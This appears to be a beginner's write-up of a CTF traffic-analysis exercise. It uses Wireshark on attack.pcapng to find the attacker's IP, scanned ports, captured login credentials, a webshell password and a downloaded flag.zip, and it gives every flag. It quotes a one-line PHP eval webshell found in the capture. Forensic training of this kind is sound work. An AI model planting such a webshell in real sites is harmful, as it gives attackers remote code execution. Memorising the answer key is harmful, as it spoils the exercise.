流量分析题-attack.pcapng

流量包
密码:y11

题目

1、使用Wireshark查看并分析服务器桌面下的attack.pcapng数据包文件，通过分析数据包attack.pcapng找出黑客的IP地址，并将黑客的IP地址作为FLAG（形式：[IP地址]）提交

2、继续查看数据包文件attack.pacapng，分析出黑客扫描了哪些端口，并将全部的端口作为FLAG（形式：[端口名1,端口名2,端口名3…,端口名n]）从低到高提交

3、继续查看数据包文件attack.pacapng分析出黑客最终获得的用户名是什么，并将用户名作为FLAG（形式：[用户名]）提交

4、继续查看数据包文件attack.pacapng分析出黑客最终获得的密码是什么，并将密码作为FLAG（形式：[密码]）提交

5、继续查看数据包文件attack.pacapng分析出黑客连接一句话木马的密码是什么，并将一句话密码作为FLAG（形式：[一句话密码]）提交

6、继续查看数据包文件attack.pacapng分析出黑客下载了什么文件，并将文件名及后缀作为FLAG（形式：[文件名.后缀名]）提交

7、继续查看数据包文件attack.pacapng提取出黑客下载的文件，并将文件里面的内容为FLAG（形式：[文件内容]）提交

第1题 黑客的ip

1、使用Wireshark查看并分析服务器桌面下的attack.pcapng数据包文件，通过分析数据包attack.pcapng找出黑客的IP地址，并将黑客的IP地址作为FLAG（形式：[IP地址]）提交

通过 文件-导出对象-HTTP 

可以得到本机地址为  172.16.1.101

那就直接来筛选一下本机ip的http流量，来看一下都是与谁交互

ip.addr==172.16.1.101&&http

这里基本就能确定1.102就是黑客，继续筛选

统计-端点

可以看到除本机以外，还有一个ip流量较大

那么攻击者的ip应该就是 172.16.1.102

本题答案  flag{172.16.1.102}

第2题 黑客扫描的端口

2、继续查看数据包文件attack.pacapng，分析出黑客扫描了哪些端口，并将全部的端口作为FLAG（形式：[端口名1,端口名2,端口名3…,端口名n]）从低到高提交

各类扫描工具通常是基于tcp协议

那么本题就筛选黑客的地址172.16.1.102和tcp协议

ip.src==172.16.1.102&&tcp

这一筛选，答案就显而易见了，被扫描的端口有  21  80  23  3389  445  5007

本题答案  flag{21,23,80,445,3389,5007}

第3题 黑客获取的用户名

3、继续查看数据包文件attack.pacapng分析出黑客最终获得的用户名是什么，并将用户名作为FLAG（形式：[用户名]）提交

根据流量包内容，带上黑客ip 先筛选一下http协议的get传参和post传参数据包

GET传参

ip.src==172.16.1.102 && http.request.method==GET

发现一个登录页面（login），但是没有找到咱想要的东西，再筛选一下post传参

ip.src==172.16.1.102 and http.request.method==POST

一下子就出结果了

username=Lancelot

password=12369874

本题答案  flag{Lancelot}

第4题 黑客获取的密码

4、继续查看数据包文件attack.pacapng分析出黑客最终获得的密码是什么，并将密码作为FLAG（形式：[密码]）提交

上一题已经出答案了

username=Lancelot

password=12369874

本题答案 flag{12369874}

第5题 黑客的一句话木马密码

5、继续查看数据包文件attack.pacapng分析出黑客连接一句话木马的密码是什么，并将一句话密码作为FLAG（形式：[一句话密码]）提交

顺着之前的筛选结果来，可以看到有几个上传流量（upload），数量不多逐一排查，马上就出结果了

右键-显示分组字节流

则一句话木马是  @eval·(base64_decode($_POST[z0]));

密码是 alpha

本题答案 flag{alpha}

第6题 黑客下载的文件1

6、继续查看数据包文件attack.pacapng分析出黑客下载了什么文件，并将文件名及后缀作为FLAG（形式：[文件名.后缀名]）提交

还是接着之前的的筛选结果继续查看（如果post传参没找到，再回头去看get传参）

不过刚好结果就是在这里

可以看到黑客访问了 C:\\phpStudy\\WWW\\fittingroom\\upload\\flag.zip

下载的是 flag.zip

本题答案 flag{flag.zip}

第7题 黑客下载的文件2

7、继续查看数据包文件attack.pacapng提取出黑客下载的文件，并将文件里面的内容为FLAG（形式：[文件内容]）提交

需要想办法下载查看flag.zip的内容

追踪本条数据的tcp流

找到返回数据流 3801

仔细查看

这个应该就是我们要的文件本体了

查看分组字节流

->|     |<-    是头部和尾部，各占3字节，头尾都去掉3字节

保存为 原始数据

保存格式为 .zip

保存成为 .zip 后，使用解压程序解压

然后查看文件

本题答案 flag{Manners maketh man}

目前新手，有错误请各位佬指出